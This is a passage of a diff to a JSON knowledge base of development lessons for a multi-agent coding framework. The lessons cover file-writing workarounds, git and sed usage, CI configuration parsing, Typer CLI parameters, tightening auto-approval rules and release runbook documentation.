changed (specific files, functions, lines), (2) WHERE to find it (absolute file paths, not relative), (3) HOW to implement (code examples showing before/after), (4) WHY this approach (rationale, trade-offs). Missing any question creates incomplete handoffs between agents. Use this checklist before finalizing any analysis or findings document in multi-agent workflows.", - "code_example": "```python\n# ✅ COMPLETE Analysis Structure\nanalysis_doc = {\n \"what\": \"Added workflow state persistence to prevent re-execution on restart\",\n \"where\": {\n \"files\": [\"/absolute/path/to/orchestrator.py\", \"/absolute/path/to/state_manager.py\"],\n \"functions\": [\"orchestrator.save_state()\", \"state_manager.load_checkpoint()\"]\n },\n \"how\": {\n \"before\": \"# State lost on restart\\nself.current_subtask = None\",\n \"after\": \"# Persist state\\nself.state_manager.save_checkpoint(self.current_subtask)\\nself.current_subtask = self.state_manager.load_checkpoint() or None\"\n },\n \"why\": \"Prevents wasted computation by resuming from last checkpoint. Trade-off: 50ms overhead per save vs hours of re-execution.\"\n}\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T12:26:06.880415Z", - "last_used_at": "2025-10-18T12:26:06.880415Z", - "related_bullets": [], - "tags": [ - "documentation", - "analysis", - "completeness", - "multi-agent", - "code-quality", - "handoff" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "qual-0002", - "content": "Template Purpose Classification: Distinguish template types by purpose when setting optimization targets. Teaching templates (e.g., Evaluator with scoring patterns) require concrete code examples and detailed explanations - apply stricter compression ceiling (≤150% over target) to preserve pedagogical value. Validation templates (e.g., Monitor with pass/fail criteria) can use summaries and abbreviated context - permit looser ceiling (≤200% over target) for efficiency. Purpose determines acceptable compression trade-offs: teaching prioritizes completeness (student learning), validation prioritizes speed (binary decisions). Evidence: Monitor template at 135% over target received praise for efficiency, Evaluator template at 238% over target raised concerns about over-compression - different purposes, different quality thresholds.", - "code_example": "```python\n# Template purpose classification system\nclass TemplatePurpose(Enum):\n TEACHING = \"teaching\" # Evaluator, detailed patterns\n VALIDATION = \"validation\" # Monitor, pass/fail checks\n\nclass OptimizationPolicy:\n POLICIES = {\n TemplatePurpose.TEACHING: {\n \"max_ceiling\": 1.5, # 150% over target\n \"preserve\": [\"code_examples\", \"rationale\", \"context\"],\n \"allow_summaries\": False,\n \"priority\": \"pedagogical_completeness\"\n },\n TemplatePurpose.VALIDATION: {\n \"max_ceiling\": 2.0, # 200% over target\n \"preserve\": [\"criteria\", \"thresholds\"],\n \"allow_summaries\": True,\n \"priority\": \"decision_speed\"\n }\n }\n \n @staticmethod\n def get_ceiling(purpose: TemplatePurpose, target_reduction: float):\n policy = OptimizationPolicy.POLICIES[purpose]\n return target_reduction * policy[\"max_ceiling\"]\n\n# Usage:\n# Teaching template (Evaluator)\neval_ceiling = OptimizationPolicy.get_ceiling(TemplatePurpose.TEACHING, 0.5)\n# Result: 0.75 max reduction (50% * 150%)\n\n# Validation template (Monitor) \nmonitor_ceiling = OptimizationPolicy.get_ceiling(TemplatePurpose.VALIDATION, 0.5)\n# Result: 1.0 max reduction (50% * 200%)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T18:00:00.000000Z", - "last_used_at": "2025-10-18T18:00:00.000000Z", - "related_bullets": [ - "impl-0004", - "qual-0001" - ], - "tags": [ - "template", - "optimization", - "classification", - "purpose", - "teaching", - "validation", - "evaluator", - "monitor", - "map-framework", - "python" - ], - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "TOOL_USAGE": { - "description": "Proper usage of libraries, frameworks, APIs, and development tools", - "bullets": [ - { - "id": "tool-0001", - "content": "Proactive Tool Limit Handling for Large Content: Check content size BEFORE choosing Write tool strategy to prevent parameter limit errors. For content >500 lines or >50KB, ALWAYS use temp file + mv approach instead of Write tool directly. Write tool has parameter size limits (~32KB in some environments) causing silent truncation or rejection. Pattern: (1) Write content to /tmp/ via Python/bash heredoc, (2) Verify written content completeness (line count), (3) Move to final destination with mv. This bypasses tool parameter limits by using file I/O directly. Threshold proven: 588-line file succeeded with temp approach after Write tool would have hit limits.", - "code_example": "```python\n# ❌ RISKY - Write tool for large content (may hit limits)\ncontent = generate_large_content() # 588 lines, 35KB\nwrite_tool(path='/final/path.txt', content=content)\n# Risk: Tool parameter limit → truncated file or rejection\n\n# ✅ SAFE - temp file + mv for large content\nimport tempfile\nimport subprocess\nimport os\n\ndef write_large_content_safely(content: str, final_path: str):\n \"\"\"Write large content using temp file to bypass tool limits\"\"\"\n \n # Check if content exceeds safe threshold\n line_count = content.count('\\n')\n size_kb = len(content.encode('utf-8')) / 1024\n \n if line_count < 500 and size_kb < 50:\n # Safe to use Write tool directly\n write_tool(path=final_path, content=content)\n return\n \n # Exceeds threshold - use temp file approach\n logger.info(\n f\"Large content detected ({line_count} lines, {size_kb:.1f}KB). \"\n f\"Using temp file approach.\"\n )\n \n # Step 1: Write to temp file\n with tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.txt') as tmp:\n tmp.write(content)\n tmp_path = tmp.name\n \n # Step 2: Verify completeness\n with open(tmp_path) as f:\n written_lines = sum(1 for _ in f)\n \n expected_lines = content.count('\\n') + 1\n if written_lines != expected_lines:\n raise ValueError(\n f\"Content truncation detected: wrote {written_lines} lines, \"\n f\"expected {expected_lines}\"\n )\n \n # Step 3: Move to final destination\n os.makedirs(os.path.dirname(final_path), exist_ok=True)\n subprocess.run(['mv', tmp_path, final_path], check=True)\n \n logger.info(f\"Successfully wrote {line_count} lines to {final_path}\")\n\n# Usage:\ncontent = generate_verified_facts_workflow() # 588 lines\nwrite_large_content_safely(content, 'docs/knowledge_base/verified_facts_workflow.txt')\n```", - "tags": [ - "write-tool", - "file-limits", - "temp-file", - "large-content", - "python", - "bash", - "workaround", - "tool-usage", - "map-framework" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-21T10:08:01.014433Z", - "related_bullets": [ - "impl-0010", - "impl-0005" - ] - }, - { - "id": "tool-0013", - "content": "Bulk Text Replacement: sed vs Edit Tool Trade-offs: For 50+ identical replacements across multiple files, use sed with git verification rather than individual Edit tool calls. Pattern: (1) Run sed with backup: 'sed -i.bak s/old/new/g files', (2) Use git diff for sampling verification, (3) Create descriptive commit with counts. Benefits: 10x faster than Edit calls, atomic operation, easy rollback. Limitations: sed can't handle context-aware changes. Decision criteria: Use sed when replacement is purely textual (command syntax, import paths), use Edit when replacement requires code understanding (refactoring logic, updating arguments). ALWAYS verify with git diff before committing sed changes.", - "tags": [ - "tools", - "automation", - "refactoring" - ], - "helpful_count": 1, - "last_used": "2025-10-24T11:00:00Z" - }, - { - "id": "tool-0014", - "content": "Git History Preservation with 'git mv': When moving or renaming files in Git, ALWAYS use 'git mv' instead of manual mv + git add/rm. Git mv explicitly preserves file history, making git log --follow and git blame work correctly across renames. Manual move breaks history tracking - Git treats it as delete + create, losing authorship and change history. This is critical for code archaeology (understanding why code exists), security audits (tracking vulnerability introductions), and compliance (proving authorship). Use 'git mv' for ALL file relocations, even within same directory (renaming). Verify history preservation after move with 'git log --follow '.", - "code_example": "```bash\n# ❌ WRONG - Manual move breaks Git history\nmv src/old_name.py src/new_name.py\ngit add src/new_name.py\ngit rm src/old_name.py\ngit commit -m \"Rename file\"\n# Result: git log src/new_name.py shows only commit after move\n# History from old_name.py is lost unless using --follow flag\n\n# ✅ CORRECT - git mv preserves history explicitly\ngit mv src/old_name.py src/new_name.py\ngit commit -m \"Rename old_name.py to new_name.py\"\n# Result: git log --follow src/new_name.py shows complete history\n\n# Verification:\ngit log --follow --oneline src/new_name.py\n# Should show commits from before rename\n\ngit blame src/new_name.py\n# Should show original authors, not just person who moved file\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T13:32:16.485303Z", - "last_used_at": "2025-10-25T13:32:16.485304Z", - "related_bullets": [ - "tool-0013" - ], - "tags": [ - "git", - "version-control", - "history-preservation", - "refactoring", - "file-movement", - "bash", - "git-mv" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "tool-0078", - "content": "Self-Documenting Workflow Configuration: Embed third-party service setup instructions (OIDC trusted publishing, webhooks, API keys) directly in workflow/script header comments with EXACT project-specific values. Include service URL, required fields (repository owner, workflow name, environment), and step-by-step setup process. This eliminates wiki hunting and prevents configuration drift when onboarding new maintainers. Pattern particularly valuable for one-time setups that are infrequently modified.", - "code_example": "```yaml\n# ❌ POOR - external documentation link (breaks when wiki moves)\n# Setup: See https://wiki.example.com/oidc-setup\nname: Publish to TestPyPI\njobs:\n publish:\n runs-on: ubuntu-latest\n\n# ✅ GOOD - embedded setup instructions with project values\n# TestPyPI Trusted Publishing Setup (One-time configuration):\n# 1. Navigate to https://test.pypi.org/manage/account/publishing/\n# 2. Click \"Add a new pending publisher\"\n# 3. Fill in these EXACT values:\n# - PyPI Project Name: mapify-cli\n# - Owner: azalio\n# - Repository name: map-framework\n# - Workflow name: test-pypi.yml\n# - Environment name: (leave empty)\n# 4. Save configuration\n# 5. First workflow run will establish trust, subsequent runs auto-authenticate\n\nname: Publish to TestPyPI\non:\n workflow_dispatch:\njobs:\n publish:\n runs-on: ubuntu-latest\n permissions:\n id-token: write # OIDC authentication\n contents: read\n```", - "tags": [ - "github-actions", - "oidc", - "documentation", - "self-documenting", - "onboarding" - ], - "related_bullets": [ - "tool-0001", - "doc-0008" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T21:42:37.952230+00:00", - "last_used_at": "2025-10-25T21:42:37.952230+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "tool-0079", - "content": "Native Parser for Configuration Extraction: When CI workflows need values from configuration files (pyproject.toml, package.json, Cargo.toml), use language-native parsers instead of grep/sed/awk. Regex-based extraction breaks on edge cases (multiline strings, escaped quotes, comments, nested structures). Python tomllib (stdlib since 3.11) for TOML, jq for JSON, yq for YAML. Parse once, extract multiple fields. Pattern prevents fragile pipelines that break on legitimate config changes.", - "code_example": "```yaml\n# ❌ FRAGILE - regex extraction breaks on edge cases\n- name: Extract package metadata\n run: |\n PKG_NAME=$(grep '^name = ' pyproject.toml | cut -d'\"' -f2)\n # Breaks if: name = \"pkg-name\" # comment\n # Breaks if: name = \"pkg\\\"name\" # escaped quote\n # Breaks if: multiline value\n\n# ✅ ROBUST - native TOML parser\n- name: Extract package metadata\n run: |\n python3 << 'EOF'\n import tomllib\n import sys\n\n with open('pyproject.toml', 'rb') as f:\n cfg = tomllib.load(f)\n\n # Extract multiple fields in one parse\n print(f\"PKG_NAME={cfg['project']['name']}\")\n print(f\"PKG_VERSION={cfg['project']['version']}\")\n print(f\"PYTHON_REQUIRES={cfg['project']['requires-python']}\")\n EOF\n # Handles all edge cases: escapes, multiline, comments, nested dicts\n\n# Alternative for JSON (package.json)\n- name: Extract from package.json\n run: |\n PKG_NAME=$(jq -r '.name' package.json)\n PKG_VERSION=$(jq -r '.version' package.json)\n\n# Alternative for YAML (using yq)\n- name: Extract from config.yml\n run: |\n APP_NAME=$(yq '.app.name' config.yml)\n```", - "tags": [ - "ci-cd", - "parsing", - "toml", - "python", - "configuration", - "robustness" - ], - "related_bullets": [], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T21:42:37.952230+00:00", - "last_used_at": "2025-10-25T21:42:37.952230+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "tool-0080", - "content": "Edit Tool Read-First Workflow: ALWAYS Read file before using Edit tool to capture exact substrings, avoiding 'old_string not found' errors in structured documents (markdown with headings, code blocks). Mental approximation of file content leads to failed edits. Workflow: (1) Read file with offset/limit if long, (2) Copy exact old_string from Read output including whitespace/newlines, (3) Edit with sufficient surrounding context for uniqueness. Use line numbers from Read output (format: 'spaces + line number + tab + content') to locate insertion points.", - "code_example": "```python\n# ❌ INCORRECT - Edit without reading (mental approximation)\nEdit(file, old_string=\"## Section\\n\", new_string=\"## New Section\\n\")\n# Result: 'old_string not found' error\n\n# ✅ CORRECT - Read first workflow\nRead(file, offset=733, limit=6) # Get exact content at line 736\n# Output: '735\\t\\n736\\t\\n737\\t'\n\nEdit(file, \n old_string=\"\\n\\n\", # Exact from Read output (after tab)\n new_string=\"\\n\\n### New Field\\n[Documentation]\\n\\n\"\n)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T16:17:18.196096Z", - "last_used_at": null, - "related_to": [], - "tags": [ - "edit-tool", - "file-operations", - "workflow-pattern", - "error-prevention", - "read-tool" - ] - }, - { - "id": "tool-0007", - "content": "Typer CLI Parameter Type Enforcement: Typer enforces parameter types at CLI level - when function signature declares file_path: Path = typer.Argument(...), Typer treats it as POSITIONAL argument (no flag), but file_path: Path = typer.Option(...) treats it as NAMED option (requires --file-path flag). Mismatches between documentation examples and parameter declarations cause 'no such option' errors. Critical distinction: typer.Argument() creates positional params (usage: command value), typer.Option() creates flag-based params (usage: command --flag=value). Always verify Typer parameter decorator matches intended CLI usage pattern. Check function signature in implementation (not just docs) when debugging CLI errors - docs may drift from code.", - "code_example": "```python\nimport typer\nfrom pathlib import Path\n\napp = typer.Typer()\n\n# ❌ MISMATCH - docs say --file but implementation expects positional\n@app.command('validate-deps')\ndef validate_deps_wrong(\n file_path: Path = typer.Argument(..., help=\"Python file to validate\")\n):\n \"\"\"Docs incorrectly show: mapify validate-deps --file=src/main.py\"\"\"\n pass\n# Result: Users run --file flag → \"Error: No such option: --file\"\n# Root cause: Argument() means positional, not flag-based\n\n# ✅ CORRECT - Argument for positional parameters\n@app.command('validate-deps')\ndef validate_deps_positional(\n file_path: Path = typer.Argument(..., help=\"Python file to validate\")\n):\n \"\"\"Usage: mapify validate-deps src/main.py (no flag)\"\"\"\n validator = DependencyValidator()\n return validator.validate(file_path)\n\n# ✅ CORRECT - Option for flag-based parameters\n@app.command('validate-deps')\ndef validate_deps_option(\n file_path: Path = typer.Option(..., \"--file\", help=\"Python file to validate\")\n):\n \"\"\"Usage: mapify validate-deps --file=src/main.py (with flag)\"\"\"\n validator = DependencyValidator()\n return validator.validate(file_path)\n\n# Decision criteria:\n# - Use Argument() for required positional inputs (file paths, IDs)\n# - Use Option() for optional flags or when explicit naming aids clarity\n# - Match documentation examples to implementation parameter type\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T17:45:10.847688Z", - "last_used_at": "2025-10-27T17:45:10.847689Z", - "related_bullets": [ - "arch-0014", - "impl-0046" - ], - "tags": [ - "typer", - "cli", - "python", - "parameter-validation", - "type-enforcement" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "tool-bidirectional-sync", - "content": "Bidirectional Template Synchronization for CLI Tools: When developing CLI tools that distribute templates via package managers (pip install, npm install), maintain bidirectional sync between development templates (.claude/) and distribution templates (src/templates/). Pattern: dedicated verification subtask + check script (./scripts/check-template-sync.sh using diff -q) + git pre-commit hook. Critical because users get templates via 'mapify init' from packaged src/templates/, NOT from .claude/ dev directory. Evidence: Zero drift issues across 8 agent templates + 6 command templates after Sequential Thinking Integration.", - "code_example": "```bash\n#!/bin/bash\n# scripts/check-template-sync.sh\nfor agent in task-decomposer actor monitor predictor evaluator; do\n source=\".claude/agents/${agent}.md\"\n target=\"src/templates/agents/${agent}.md\"\n if ! diff -q \"$source\" \"$target\" > /dev/null; then\n echo \"❌ OUT OF SYNC: ${agent}.md\"\n exit 1\n fi\ndone\necho \"✅ All templates in sync\"\n```", - "related_to": [ - "impl-0005" - ], - "tags": [ - "cli-tools", - "template-management", - "package-distribution", - "synchronization", - "bash" - ], - "helpful_count": 1, - "last_used": "2025-10-28T14:38:42.143918" - } - ] - }, - "DEBUGGING_TECHNIQUES": { - "description": "Troubleshooting workflows, diagnostic approaches, and debugging tools", - "bullets": [ - { - "id": "debug-0009", - "content": "Debugging UV tool installation failures: (1) 'uv tool list', (2) 'uv tool dir', (3) check PATH, (4) 'which command', (5) 'uv tool install --force', (6) verify pyproject.toml entry points.", - "code_example": "", - "helpful_count": 9, - "harmful_count": 0, - "created_at": "2025-10-24T13:29:43.892099Z", - "last_used_at": "2025-10-24T13:29:43.892100Z", - "related_bullets": [], - "tags": [ - "uv", - "cli", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "debug-0001", - "content": "Progressive Security Hardening Cycle for Auto-Approval Rules: Security-critical configurations require 3+ iterations of hardening: (1) Initial broad patterns for functionality, (2) Monitor validation exposes overly permissive rules, (3) Narrow to specific paths/commands, (4) Monitor exposes wildcard edge cases, (5) Exact-match anchoring. Each iteration addresses a distinct vulnerability class. Typical progression: broad wildcards → scoped wildcards → space-delimited tokens → exact strings.", - "code_example": "```yaml\n# Iteration 1: Initial broad patterns (functionality focus)\nauto_approve:\n - \"cat *.json*\" # ❌ Monitor catches: matches .json.bak\n - \"| jq*\" # ❌ Monitor catches: binary prefix attack\n\n# Iteration 2: Narrow to specific paths (after Monitor feedback)\nauto_approve:\n - \"cat graph.json\" # ✅ Scoped to exact file\n - \"| jq*\" # ❌ Monitor catches: still allows jq-exploit\n\n# Iteration 3: Space-delimited tokens (after 2nd Monitor feedback)\nauto_approve:\n - \"cat graph.json\"\n - \"| jq *\" # ✅ Space prevents binary prefix\n # ❌ Monitor catches: trailing wildcard allows arbitrary args\n\n# Iteration 4: Exact-match anchoring (final hardening)\nauto_approve:\n - \"cat graph.json\"\n - \"| jq '.tasks'\" # ✅ Exact binary + exact arguments\n - \"git status\" # ✅ No wildcards anywhere\n\n# Result: 3 iterations to reach security-hardened config\n```", - "tags": [ - "debugging", - "security", - "progressive-hardening", - "monitor-validation", - "iterative-refinement", - "auto-approval" - ], - "helpful_count": 4, - "harmful_count": 0, - "created_at": "2025-10-27T19:38:54.477687+00:00", - "last_used_at": "2025-10-27T19:38:54.477688+00:00", - "related_bullets": [ - "sec-0003", - "sec-0004" - ], - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "DOCUMENTATION_PATTERNS": { - "description": "Best practices for maintaining clear, accurate, and maintainable documentation", - "bullets": [ - { - "id": "doc-0001", - "content": "Documentation Structure Preservation During Updates: When removing sections from markdown documentation, always verify and preserve sequential numbering of remaining sections. Use markdown's implicit numbering (all items as '1.') rather than explicit numbers ('1.', '2.', '3.') to make numbering self-correcting. After removal, validate that navigation links, cross-references, and table of contents reflect the new structure. This prevents broken documentation flow and reader confusion.", - "code_example": "```markdown\n\n1. Introduction\n2. Setup (REMOVED)\n3. Usage ← Now shows as 3 but should be 2\n4. API Reference ← Now shows as 4 but should be 3\n\n\n1. Introduction\n1. Usage ← Markdown auto-numbers as 2\n1. API Reference ← Markdown auto-numbers as 3\n\n\n1. Introduction\n2. Usage ← Manually renumbered\n3. API Reference ← Manually renumbered\n\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-23T12:06:20.145336Z", - "last_used_at": "2025-10-23T12:06:20.145337Z", - "related_bullets": [], - "tags": [ - "markdown", - "documentation", - "numbering", - "structure", - "maintenance" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0002", - "content": "Confidence Labeling in Technical Documentation: Explicitly mark verification level of technical claims using standardized labels: VERIFIED (empirically tested with bash/tools on available platform), RESEARCHED (found in authoritative documentation but not tested locally), EXPECTED (logically inferred from architecture/patterns but not directly confirmed), UNKNOWN (no evidence found). Confidence labels prevent readers from treating all claims equally - they signal which claims are definitive vs provisional. Particularly critical for cross-platform claims (feature may be VERIFIED on darwin, EXPECTED on linux), library version dependencies (VERIFIED for v2.1, EXPECTED for v2.0), and time-sensitive information (VERIFIED as of 2025-10-23). Pattern proven: documentation without confidence labels caused users to treat inferred behavior as verified fact, leading to incorrect assumptions.", - "code_example": "```markdown\n## Confidence Labeling Examples\n\n### Example 1: Platform-Specific Claim\n**Claim**: MAP framework CLI supports colored output\n**Evidence**: Tested with `map-cli --help` on macOS Terminal\n**Label**: ✅ VERIFIED (darwin/macOS Terminal, 2025-10-23)\n**Label**: ⚠️ EXPECTED (linux, not tested)\n\n### Example 2: Version-Dependent Claim\n**Claim**: context7 MCP tool requires library ID format '/org/project'\n**Evidence**: context7 documentation v1.2, not tested empirically\n**Label**: 📚 RESEARCHED (per docs v1.2, not verified in practice)\n\n### Example 3: Inferred Claim\n**Claim**: Curator agent syncs bullets with helpful_count >= 5 to cipher\n**Evidence**: Template instructions mention threshold, no cipher sync observed yet\n**Label**: 🔮 EXPECTED (per template spec, not empirically confirmed)\n\n### Example 4: Unknown\n**Claim**: Does Reflector agent support batch processing of multiple subtasks?\n**Evidence**: No documentation found, no code inspection performed\n**Label**: ❓ UNKNOWN (requires investigation)\n\n### Markdown Format Template\n```markdown\n**Feature**: [Feature name]\n**Status**: ✅ VERIFIED | 📚 RESEARCHED | 🔮 EXPECTED | ❓ UNKNOWN\n**Platform**: darwin/linux/windows (if platform-specific)\n**Version**: [library version] (if version-specific)\n**Date**: 2025-10-23 (if time-sensitive)\n**Evidence**: [verification command or documentation reference]\n```", - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-23T13:33:55.447326Z", - "last_used_at": "2025-10-27T13:12:08.809242Z", - "related_bullets": [ - "res-0001", - "doc-0001" - ], - "tags": [ - "confidence-labeling", - "documentation", - "verification-status", - "evidence", - "technical-writing", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0003", - "content": "Multi-Tier Prioritization for Large-Scale Documentation Refactoring: When updating 80+ references across 12+ files after API/CLI changes, use 4-tier priority strategy: Tier 1 (Critical) - user-facing help text and primary docs that users encounter first; Tier 2 (High) - internal technical documentation used by developers; Tier 3 (Medium) - knowledge base and presentations; Tier 4 (Low) - historical documents (add deprecation notes only, preserve original syntax). Update tiers sequentially with verification between tiers. This prevents inconsistent user experience while preserving historical context. Commit message should include tier breakdown with reference counts for traceability (e.g., 'Tier 1: 30 refs, Tier 2: 40 refs').", - "tags": [ - "documentation", - "refactoring", - "prioritization" - ], - "helpful_count": 1, - "last_used": "2025-10-24T11:00:00Z" - }, - { - "id": "doc-0004", - "content": "Historical Documentation Preservation During API Migration: When updating CLI commands or API syntax across documentation, preserve historical examples in specific contexts: (1) .reviews/ directories - leave unchanged as historical records of past code review discussions, (2) Playbook pattern examples - keep old syntax to show command evolution over time, (3) CHANGELOG.md - never update (historical document by definition), (4) Archived/deprecated docs - add deprecation notice at top pointing to current docs instead of bulk updating. This prevents confusion about 'what was the command syntax when this was written' during debugging or archaeology. Use --exclude-dir flags in sed/grep to automatically skip these directories.", - "tags": [ - "documentation", - "migration", - "preservation" - ], - "helpful_count": 1, - "last_used": "2025-10-24T11:00:00Z" - }, - { - "id": "doc-0005", - "content": "Executable Documentation with Binary Verification: For multi-stage workflows (releases, deployments, migrations), structure documentation as executable runbooks with copy-pasteable command sequences and binary success criteria. Each section must have: (1) Exact commands (no placeholders, use example values), (2) Expected Results checkboxes with measurable criteria (100% test pass, no errors, specific file exists), (3) Time-aware verification for async operations (sleep commands before checking distributed state like PyPI indexing). Structure enables both learning (detailed explanations) and execution (appendix runbook with consolidated commands). Pattern proven: 350-line RELEASING.md with 18 checkboxes across 5 sections achieved 9.1/10 quality score. Users can execute workflow mechanically by following checkboxes without interpretation.", - "code_example": "```markdown\n## Pre-Release Checklist\n\n### 1. Code Quality Checks\n\n```bash\n# Run full CI/CD test suite locally\npytest tests/ --cov=src/mapify_cli --cov-report=term-missing\n\n# Run linters\nblack src/ tests/ --check\nruff check src/ tests/\n```\n\n**Expected Results**:\n- ✅ All tests pass (100% success rate)\n- ✅ No linting errors\n- ✅ Type checking passes\n\n### 2. Time-Aware Verification (Async Systems)\n\n```bash\n# Wait for PyPI to process upload (2-5 min indexing delay)\nsleep 120\n\n# Verify package indexed\ncurl -f https://pypi.org/project/mapify-cli/1.0.1/ || echo \"❌ Not indexed yet\"\npip index versions mapify-cli | grep 1.0.1\n```\n\n## Appendix: Release Workflow Reference\n\n```bash\n# Complete command sequence (copy-paste execution mode)\ngit checkout main && git pull origin main\npytest tests/ --cov\n./scripts/bump-version.sh patch\ngit push origin main && git push origin v1.0.1\ngh release create v1.0.1 --title \"v1.0.1\" --notes \"$(sed -n '/## \\\\[1.0.1\\\\]/,/## \\\\[/p' CHANGELOG.md | head -n -1)\"\ngh run watch\nsleep 120 && pip index versions mapify-cli | grep 1.0.1\n```\n```", - "tags": [ - "documentation", - "runbooks", - "workflows", - "executable", - "verification", - "binary-criteria", - "releases", - "bash", - "markdown" - ], - "related_bullets": [ - "arch-0004", - "impl-0010", - "doc-0002" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T19:32:35.864754+00:00", - "last_used_at": "2025-10-25T19:32:35.864754+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0006", - "content": "Single Source of Truth with Explicit Derivation: In documentation with multiple artifact types (CHANGELOG, git tags, release notes), declare ONE canonical source and document explicit commands for deriving all other artifacts. This prevents content drift where artifacts diverge over time. Pattern: CHANGELOG.md as single source of truth → git tag annotation extracted via sed, GitHub release notes extracted via sed, version strings extracted via grep. Derivation commands must be copy-pasteable and deterministic (no manual text editing). Monitor caught drift where command extracted from wrong source - explicit derivation commands make errors detectable. Document derivation commands adjacent to artifact usage so maintainers see how to regenerate consistently.", - "code_example": "```markdown\n## Single Source of Truth: CHANGELOG.md\n\n**All release artifacts derive from CHANGELOG.md using these commands:**\n\n### Derive Git Tag Annotation\n\n```bash\n# Extract version section from CHANGELOG\nVERSION=\"1.0.1\"\nsed -n \"/## \\\\[$VERSION\\\\]/,/## \\\\[/p\" CHANGELOG.md | head -n -1 > tag-message.txt\n\n# Create annotated tag with CHANGELOG excerpt\ngit tag -a \"v$VERSION\" -F tag-message.txt\n```\n\n### Derive GitHub Release Notes\n\n```bash\n# Same extraction pattern ensures consistency\ngh release create v1.0.1 \\\n --title \"MAP Framework v1.0.1\" \\\n --notes \"$(sed -n '/## \\\\[1.0.1\\\\]/,/## \\\\[/p' CHANGELOG.md | head -n -1)\"\n```\n\n### Derive Version Strings\n\n```bash\n# Extract version from CHANGELOG header\ngrep -m 1 \"## \\\\[\" CHANGELOG.md | sed 's/.*\\\\[\\\\(.*\\\\)\\\\].*/\\\\1/'\n\n# Verify matches pyproject.toml\ngrep 'version = ' pyproject.toml | sed 's/.*\"\\\\(.*\\\\)\".*/\\\\1/'\n```\n\n**Why This Works:**\n- ❌ Manual copy-paste → content drift (typos, omissions)\n- ✅ Explicit derivation → deterministic consistency\n- ✅ Commands documented → maintainers regenerate correctly\n- ✅ Drift detection → Monitor catches wrong source usage\n```", - "tags": [ - "documentation", - "single-source-of-truth", - "derivation", - "consistency", - "changelog", - "releases", - "bash", - "sed", - "grep" - ], - "related_bullets": [ - "doc-0004", - "impl-0018" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T19:32:35.864754+00:00", - "last_used_at": "2025-10-25T19:32:35.864754+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0007", - "content": "Checklist-Troubleshooting Symmetry: Structure troubleshooting sections to mirror pre-flight checklists with 1:1 mapping. For each pre-flight checkpoint (e.g., 'Git Repository State', 'PyPI OIDC Setup'), create corresponding troubleshooting subsection addressing failures at that checkpoint. This symmetry reduces cognitive load - users map error symptoms to relevant troubleshooting section without searching. Pattern: 5 pre-release sections (Code Quality, Documentation, Dependencies, Git State, PyPI Setup) → 4 troubleshooting categories by component (Version Validation, Git State, CI/CD, PyPI OIDC). Include debug checklist mirroring pre-flight checkbox structure. Users follow same mental model for success path and failure recovery.", - "code_example": "```markdown\n## Pre-Release Checklist\n\n### 4. Git Repository State\n\n```bash\n# Verify on main branch\ngit branch --show-current\n# Expected: main\n\n# Verify working directory is clean\ngit status\n# Expected: \"nothing to commit, working tree clean\"\n```\n\n**Requirements**:\n- ✅ On `main` branch\n- ✅ Working directory is clean (no uncommitted changes)\n- ✅ Local branch is up to date with origin/main\n\n---\n\n## Troubleshooting\n\n### Git State Issues (mirrors section 4 above)\n\n#### Issue: \"Git working directory is not clean\"\n\n```bash\n# Check what's changed (same verification command)\ngit status\n\n# Fix: Commit changes\ngit add .\ngit commit -m \"chore: prepare for release\"\n```\n\n#### Issue: \"Not on main branch\"\n\n```bash\n# Check current branch (same verification command)\ngit branch --show-current\n\n# Fix: Switch to main\ngit checkout main\ngit pull origin main\n```\n\n### Debug Checklist (mirrors pre-flight structure)\n\n2. **Git State** (maps to Pre-Release Checklist #4):\n - [ ] On `main` branch\n - [ ] Working directory clean\n - [ ] Tag pushed to origin\n```", - "tags": [ - "documentation", - "troubleshooting", - "checklists", - "symmetry", - "user-experience", - "debugging", - "workflows", - "releases" - ], - "related_bullets": [ - "arch-0004", - "impl-0010", - "doc-0005" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T19:32:35.864754+00:00", - "last_used_at": "2025-10-25T19:32:35.864754+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0008", - "content": "Testable Documentation with Programmatic Verification: Design documentation examples with binary success criteria that can be programmatically verified via bash commands. Structure: (1) Command example, (2) Expected output/result with exact values (not 'success' - specify '100% test pass', 'exit code 0', 'file exists at /path'), (3) Verification command to check actual matches expected. This enables documentation CI/CD - automated verification prevents documentation rot where examples break as code evolves. Use grep/test commands for verification: 'pytest --cov && echo $? # Expected: 0', 'curl -f URL || echo FAILED'. Pattern proven: 18 checkboxes in RELEASING.md with measurable criteria (100% test pass, no errors, specific URLs) are programmatically verifiable.", - "code_example": "```markdown\n## Code Quality Checks\n\n### Example: Run Test Suite\n\n```bash\n# Command with inline verification\npytest tests/ --cov=src/mapify_cli --cov-report=term-missing\necho \"Exit code: $?\" # Verification point\n```\n\n**Expected Results** (programmatically verifiable):\n- ✅ All tests pass (100% success rate) → Verify: `pytest --tb=no -q && echo PASS || echo FAIL`\n- ✅ Coverage > 